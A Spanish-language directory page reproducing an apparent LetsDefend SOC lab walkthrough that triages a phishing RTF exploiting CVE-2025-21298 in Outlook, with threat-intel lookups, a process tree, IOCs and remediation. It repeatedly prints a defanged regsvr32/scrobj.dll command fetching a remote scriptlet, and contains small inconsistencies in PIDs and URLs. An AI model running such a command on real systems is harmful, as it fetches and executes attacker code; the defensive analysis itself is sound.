Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
SOC336-Windows-OLE-Zero-Click-RCE-Exploitation-Detected-CVE-2025-21298 — SOC336 - Guía paso a paso: Detección de explotación RCE de cero clics en OLE de Windows (CVE-2025-21298) | Kitploit
Herramientas/GitHubGitHub/abc1230940/soc336-windows-ole-zero-click-rce-exploitation-detected-cve-2025-21298
Análisis de VulnerabilidadesExplotaciónMovimiento LateralIngeniería InversaAnálisis ForensePhishingAnálisis de MalwareComando y ControlInteligencia de Amenazas

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Aprendizaje y Educación
Respuesta a Incidentes
Seguridad de Correo Electrónico
GitHubabc1230940/soc336-windows-ole-zero-click-rce-exploitation-detected-cve-2025-21298

SOC336-Windows-OLE-Zero-Click-RCE-Exploitation-Detected-CVE-2025-21298

SOC336 - Guía paso a paso: Detección de explotación RCE de cero clics en OLE de Windows (CVE-2025-21298)

Ver RepositorioSitio web
hace 2 mesesAún no revisado
Compartir

LinkedIn Gmail Instagram Old Discord Reddit


SOC336 - Detección de Explotación RCE Zero-Click OLE de Windows (CVE-2025-21298) Walkthrough

phishing email

🔎 Tabla de Contenido
  1. Situación
  2. Resumen de la Alerta
  3. Herramientas Utilizadas
  4. Análisis
    • Seguridad del Correo Electrónico
    • Gestión de Registros
      • Registro de Proxy
    • Seguridad del Endpoint
      • Historial del Terminal
      • Acción de Red
      • Procesos
      • CVE-2025-21298
  5. Playbook
  6. Nota del Analista
  7. Referencia

(Volver al inicio)

Situación

Uno de nuestros empleados, Austin, recibió un correo electrónico de phishing de un remitente sospechoso y se activó una alerta después de que abriera el correo usando Outlook el 4 de febrero de 2025 a las 04:18 PM. El motivo de la activación fue "Adjunto RTF malicioso identificado con patrón de exploit conocido CVE-2025-21298" .

(Volver al inicio)

Resumen de la Alerta

image

EventID : 314

Hora del Evento : Feb, 04, 2025, 04:18 PM (creo que estaba mal)

Regla : SOC336 - Detección de Explotación RCE Zero-Click OLE de Windows (CVE-2025-21298)

Nivel : Analista de Seguridad

Dirección SMTP : 84.38.130.118

Dirección de Origen : [email protected]

Dirección de Destino : [email protected]

Asunto del Correo : Importante: Acción Requerida para la Próxima Fecha Límite del Proyecto

Adjunto : mail.rtf

Hash del Adjunto : df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184

Acción del Dispositivo : Permitido

Motivo de Activación : Adjunto RTF malicioso identificado con patrón de exploit conocido CVE-2025-21298.

(Volver al inicio)

Herramientas Utilizadas

  1. VirusTotal
  2. AbuseIPDB
  3. Gemini

(Volver al inicio)

Análisis

Profundicemos en los registros de Seguridad del Correo Electrónico, Gestión de Registros y Seguridad del Endpoint para el triaje de la alerta.

Seguridad del Correo Electrónico

Screenshot 2026-05-27 151659

Busqué la dirección del remitente projectmanagement@pm[.]me y hice clic en el correo "Importante: Acción Requerida para la Próxima Fecha Límite del Proyecto" enviado a las 05:12 AM del mismo día, lo que me pareció extraño porque los tonos y palabras urgentes como "Importante" y "Acción Requerida" me dieron una pista de que se trataba de un correo de phishing.



Screenshot 2026-05-27 175944

Busqué el dominio pm[.]me en VirusTotal y solo 1 proveedor lo consideró sospechoso.



Screenshot 2026-05-27 151915

Sin embargo, cuando busqué la dirección SMTP 84[.]38[.]130[.]118, 7 proveedores la marcaron como Maliciosa y Malware, y estaba relacionada con el servidor C2 SILVER.



Screenshot 2026-05-27 180753 Screenshot 2026-05-27 180810

84[.]38[.]130[.]118 también se encontró en la base de datos de AbuseIPDB. Se ubica en Riga, Riga, Letonia, pertenece al nombre de dominio rixhost.lv y está categorizada como Ataque DDoS, Hacking y Host Explotado.



Screenshot 2026-05-27 152243

Finalmente, busqué el hash df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184 del adjunto mail.rtf en VirusTotal y 29 de 61 proveedores marcaron el adjunto como Malicioso. Pertenece a la familia de malware rtfmalformb y estaba asociado con la vulnerabilidad CVE-2025-21298.

Se confirmó que se envió un correo de phishing con un adjunto malicioso a Austin.

(Volver al inicio)

Gestión de Registros

Investiguemos si hubo actividades sospechosas después de las 05:12 AM cuando Austin abrió el correo de phishing.

Registro de Proxy

Screenshot 2026-05-27 152515

Primero revisé el registro de proxy y busqué la dirección IP maliciosa del remitente 84[.]38[.]130[.]118, descubriendo que a las 08:06 AM hubo una solicitud HTTP GET a la dirección IP maliciosa con una URL hxxp://84[.]38[.]130[.]118/shell[.]sct iniciada por cmd.exe, descargando un archivo scriptlet de Windows. El código de respuesta fue 200 OK, lo que indica que el tráfico saliente fue permitido y no bloqueado por el firewall. Era inusual obtener un archivo de script que posiblemente contenía un script de reverse shell.

(Volver al inicio)

Seguridad del Endpoint

Historial del Terminal

image Screenshot 2026-05-27 153447

Dado que el tráfico saliente hacia la dirección IP maliciosa fue iniciado por cmd.exe, primero revisé el historial del terminal y encontré que a las 08:06:08 AM se ejecutó el comando "C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" para generar regsvr32.exe y obtener el archivo scriptlet de la dirección IP maliciosa mediante scrobj.dll.

  • regsvr32.exe: una utilidad de línea de comandos para registrar y anular el registro de controles OLE, como DLL y controles ActiveX en el Registro de Windows
  • /s: regsvr32.exe se ejecutó en segundo plano y de forma silenciosa
  • /u: forzó a Windows a no agregar esta clave al Registro de Windows
  • /i: interfaz
  • scrobj.dll: Biblioteca de tiempo de ejecución de objetos de script que maneja archivos scriptlet

¡Usar las utilidades integradas de Windows para obtener el script puede dejar rastros mínimos en el sistema, dificultando el proceso de ingeniería inversa y análisis de malware!

(Volver al inicio)

Acción de Red

Screenshot 2026-05-27 153102

Se confirmó que hubo una conexión a la IP maliciosa 84[.]38[.]130[.]118 a las 08:06:42 AM, después del evento de ejecución del comando.

(Volver al inicio)

Procesos

Entonces, ¿por qué se ejecutó cmd.exe con solo hacer clic en un correo electrónico? Si bien no se encontró evidencia de la descarga del adjunto malicioso mail.rtf por parte de Austin, revisé los registros del endpoint y busqué cualquier evento alrededor de las 08:06 AM.

Screenshot 2026-05-27 153636

ID del Proceso: 7023

Hora del evento: Feb 04 2025 08:06:25

Línea de comandos: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"

Proceso padre: cmd.exe



Screenshot 2026-05-27 153616

Bien, entonces veamos el proceso padre cmd.exe

ID del Proceso: 6784

Hora del evento: Feb 04 2025 08:06:08

Línea de comandos: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"

Proceso padre: outlook.exe



Screenshot 2026-05-27 154136

Y finalmente revisé el proceso padre de outlook.exe

ID del Proceso: 4820

Hora del evento: Feb 04 2025 08:05:15

Línea de comandos: "C:\Windows\System32\cmd.exe"

Proceso padre: explorer.exe



Podemos concluir los procesos maliciosos en un árbol:

explorer.exe -> outlook.exe (PID:4820) -> cmd.exe (PID:4784) -> regsvr32.exe (PID:7023) -> ¡Ejecución del Script!

Sin embargo, todavía me preguntaba cómo se iniciaron los procesos maliciosos sin descargar y abrir el adjunto malicioso, y cómo outlook.exe generó el proceso malicioso hasta que encontré información sobre CVE-2025-21298.

(Volver al inicio)

CVE-2025-21298

Screenshot 2026-05-27 201652

Según el artículo de Offsec, hubo una vulnerabilidad crítica de Windows OLE zero-click que permite RCE a través del correo electrónico con una puntuación CVSS de 9.8 en enero de 2025. Cuando el destinatario objetivo simplemente abre o previsualiza el correo malicioso en Microsoft Outlook que contiene un documento RTF dañino con un script incrustado, la vulnerabilidad se activa, permitiendo al atacante ejecutar código arbitrario en el sistema afectado.

Investigué sobre Windows OLE y los procesos de secuestro del documento RTF en Google y Gemini, y lo relacioné con algunos de mis conocimientos de ingeniería inversa:

  1. Al abrir o previsualizar el documento RTF, la función UtOlePresStmToContentsStm dentro de ole32.dll, un objeto OLE señalado por pstmContents, lee los datos de la imagen en miniatura (OlePres) y los vuelca en un archivo de datos real (CONTENT).
  2. La función activa inmediatamente un error de procesamiento inesperado debido al formato corrupto del archivo RTF del atacante, causando la eliminación del objeto OLE pero no del puntero pstmContents.
  3. El archivo RTF malicioso creó un objeto OLE malicioso que contenía el código malicioso exactamente del mismo tamaño que el objeto OLE eliminado, llenando el mismo espacio de memoria aún apuntado por el puntero pstmContents.
  4. Después de que Outlook terminó la previsualización, ejecuta el falso proceso de "limpieza" que contiene código malicioso "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" dentro del objeto OLE malicioso falso.
  5. El sistema de la víctima ejecuta el payload remoto y establece una reverse shell automáticamente sin ningún clic.

(Volver al inicio)

Playbook

Screenshot 2026-05-28 144059 Screenshot 2026-05-28 144109 Screenshot 2026-05-28 144141 Screenshot 2026-05-28 144154 Screenshot 2026-05-28 144226 Screenshot 2026-05-28 144240

No puesto en cuarentena

Screenshot 2026-05-28 144252

Malicioso

Screenshot 2026-05-28 144306

Accedido

Screenshot 2026-05-28 144316 Screenshot 2026-05-28 144343 Screenshot 2026-05-28 144730 Screenshot 2026-05-28 144804 Screenshot 2026-05-28 144844 Screenshot 2026-05-28 144940 Screenshot 2026-05-28 145001

(Volver al inicio)

Nota del Analista

Clasificación: Crítica

Tipo: Malware

Hora de la Actividad:

Feb, 04, 2025, 05:12 AM (Correo de phishing recibido)

Feb, 04, 2025, 08:05:15 AM - Feb, 04, 2025, 08:06:42 AM (Correo de phishing abierto y código malicioso ejecutado)

Entidades Afectadas:

Dirección de Origen: projectmanagement@pm[.]me

Dirección SMTP: 84[.]38[.]130[.]118

Dirección de Correo del Destinatario: Austin@letsdefend[.]io

Dirección IP del Destinatario: 172[.]16[.]17[.]137

Nombre de Host: Austin

Razones para Falso Positivo:

El 4 de febrero de 2025 a las 05:12 AM se envió un correo sospechoso con el asunto "Importante: Acción Requerida para la Próxima Fecha Límite del Proyecto" desde [email protected] (Dirección IP: 84.38.130.118) a [email protected] (Dirección IP: 172.16.17.137) con un adjunto mail.rtf (hash SHA256: df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184). Los tonos y palabras de urgencia utilizados en el asunto dieron una pista de que se trataba de un correo de phishing. Las fuentes de inteligencia de amenazas VirusTotal y AbuseIPDB marcaron la dirección IP del remitente, ubicada en Riga, Riga, Letonia y perteneciente al nombre de dominio rixhost.lv, y el adjunto como maliciosos y malware.

Según los registros de proxy, a las 08:06 AM hubo una solicitud HTTP GET a la dirección IP maliciosa con una URL hxxp://84[.]38[.]130[.]118/shell[.]sct iniciada por cmd.exe, descargando un archivo scriptlet de Windows. El código de respuesta fue 200 OK, lo que indica que el tráfico saliente hacia la dirección IP maliciosa fue permitido y no bloqueado por el firewall.

Según los registros de Seguridad del Endpoint, el código malicioso "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" (PID: 7023) fue iniciado por cmd.exe (PID: 6784) generado desde outlook.exe (PID: 4820).

La explotación fue causada por una vulnerabilidad crítica de Windows OLE zero-click (CVE-2025-21298) que permite RCE a través del correo electrónico con una puntuación CVSS de 9.8 en enero de 2025. Cuando el destinatario objetivo simplemente abre o previsualiza el correo malicioso en Microsoft Outlook que contiene un documento RTF dañino con un script incrustado, la vulnerabilidad se activa, permitiendo al atacante ejecutar código arbitrario en el sistema afectado, potencialmente estableciendo una reverse shell al servidor C2.

Razones para escalamiento:

Si bien aún no se ha observado de manera definitiva tráfico de red C2 activo posterior a la explotación, los registros de seguridad del endpoint confirmaron la ejecución de regsvr32.exe usando scrobj.dll para obtener el archivo scriptlet shell.sct. Debido a la puntuación CVSS de 9.8 del CVE-2025-21298, se requiere una investigación adicional para verificar si hay alguna actividad sospechosa en el host, como persistencia o exfiltración de datos.

Remedios:

  • Desconectar inmediatamente el host Austin de la red interna corporativa
  • Terminar el proceso de "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" y sus procesos relacionados cmd.exe, outlook.exe
  • Bloquear el tráfico saliente hacia 84[.]38[.]130[.]118
  • Agregar a la lista negra el dominio rixhost[.]lv
  • Agregar a la lista negra al remitente projectmanagement@pm[.]me en el servidor de correo
  • Parchear la vulnerabilidad CVE-2025-21298
  • Restablecer las credenciales de Austin
  • Realizar un Análisis de Memoria en el host Austin para investigar las actividades maliciosas como conexión C2, persistencia, exfiltración de datos después de la ejecución de shell.sct
  • Realizar ingeniería inversa en shell.sct
  • Realizar análisis de correo electrónico para investigar la IP de origen, la dirección de retorno en el encabezado del correo
  • Bloquear el acceso a Internet iniciado por regsvr32.exe
  • Realizar una campaña de concienciación sobre phishing para educar a los empleados a no abrir correos electrónicos de remitentes desconocidos o con tono o palabras urgentes

Indicadores de Compromiso:

  • Dirección del remitente: projectmanagement@pm[.]me
  • Dirección IP del remitente: 84[.]38[.]130[.]118 Dominio del remitente: rixhost[.]lv
  • Correo de phishing: "Important: Action Required for Upcoming Project Deadline"
  • Documento malicioso: mail.rtf (SHA256 hash: df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184)
  • Árbol de procesos malicioso: outlook.exe (PID: 4820) -> cmd.exe (PID: 6784) -> regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" (PID: 7023)
  • URL del segundo payload: hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll

(Volver al inicio)

Referencia

Detalle de CVE-2025-21298

CVE-2025-21298: Una vulnerabilidad crítica de Windows OLE de cero clics

(Volver al inicio)

Descargar herramienta